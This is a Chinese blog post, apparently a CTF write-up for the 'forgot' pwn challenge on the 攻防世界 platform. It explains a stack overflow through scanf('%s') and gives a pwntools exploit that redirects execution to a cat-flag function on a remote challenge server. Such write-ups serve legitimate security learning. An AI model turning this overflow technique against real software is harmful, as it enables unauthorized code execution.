攻防世界2

樊少泽2024-10-13 22:21

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码 
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
DeeplyMind7 小时前
第12章 Docker存储机制(重要)
运维·docker·容器
鸠摩智首席音效师7 小时前
如何在 Linux 中将文件复制到多个目录 ?
linux·运维·服务器
香蕉你个不拿拿^8 小时前
Linux进程地址空间解析
linux·运维·服务器
人间打气筒(Ada)8 小时前
Linux学习~日志文件参考
linux·运维·服务器·学习·日志·log·问题修复
xuhe29 小时前
Claude Code配合Astro + GitHub Pages:为 sharelatex-ce 打造现代化的开源项目宣传页
linux·git·docker·github·浏览器·overleaf
charlie1145141919 小时前
RK3568跑Arch Linux全路程指南(以正点原子的RK3568开发板为例子)
linux·嵌入式·rootfs·教程·环境配置·嵌入式linux·工程实践
OpsEye9 小时前
交换分区优化实战:从监控到调优,让系统告别卡顿
运维·it·监控·告警·swap·监控系统·交换分区
大熊程序猿9 小时前
metabase 报表使用
运维
爆米花byh9 小时前
在RockyLinux9环境的Doris单机版安装
linux·数据库·database
feichang_notlike310 小时前
Windows (WSL2) 搭建 openclaw
运维
热门推荐
01PHP Error: 常见错误及其解决方法02GitHub 镜像站点03openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05UV安装并设置国内源06Android Studio Panda 1 正式版来了:JDK 终于不用手动配了,内存泄漏也有原生方案了07HTB 赛季10 - Pterodactyl - user08243 行 microGPT:把“训练 + 推理”拆到骨头里09配置 OpenClaw 使用 Ollama 本地模型10全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)